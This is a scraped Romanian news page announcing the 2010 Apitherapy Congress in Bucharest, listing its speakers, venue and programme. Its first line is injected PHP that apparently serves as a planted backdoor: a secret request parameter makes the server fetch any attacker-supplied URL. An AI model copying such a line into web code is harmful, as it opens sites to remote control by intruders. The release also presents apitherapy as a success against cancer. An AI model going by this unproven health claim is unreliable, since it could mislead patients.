isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Congres de APITERAPIE - MedicAS

Congres de APITERAPIE

28 October 2010

             Societatea Romana de Apiterapie va invita vineri, 29 octombrie 2010, la ora 11, la conferinta de presa organizata cu ocazia deschiderii celui de-al treilea Congres de Apiterapie cu participare internationala, Api-Expo si Atelier practic, ce va avea loc la RIN Grand Hotel, sala Berlina, in perioada 29 octombrie - 1 noiembrie. La eveniment vor participa dna Monica Tatoiu, una dintre povestile de succes in lupta cu cancerul prin intermediul apiterapiei, si numerosi specialisti de talie internationala in domeniu, printre care: Dr. Stefan Stangaciu (Romania), medic specialist in medicina de familie si       Presedinte al Societatilor Romane si Germane de Apiterapie, Dr. Cristina AOSAN, membru al Comisiei permanente de Apiterapie a Apimondiei, Dr. Verica Milojkovic (Serbia), Presedinte al Societatii Sarbe de Apiterapie, Dr. Noriko Hattori si Dr. Kenji Ichihara (Japonia) de la Laboratorul de Biologie Moleculara al Gifu Pharmaceutical University si Prof. Dr. Sanjeev Sood de la Dayanand Ayurvedic College, India.
           
Programul Congresului poate fi consultat la adresa www.apiterapie.ro. Va anuntam ca la masa rotunda despre tratamente apiterapeutice in tumori, programata sambata, 30 octombrie, la ora 11.00, va participa si dna Monica Tatoiu.
           
La Congres sunt asteptati sa asiste si sa ia parte medici, farmacisti si orice persoana care lucreaza in domeniul sanitar si/sau in ecologie, biologie, apicultura.


Articole asemănătoare:


Adaugă un comentariu


 
 

Newsletter

Loading... Loading...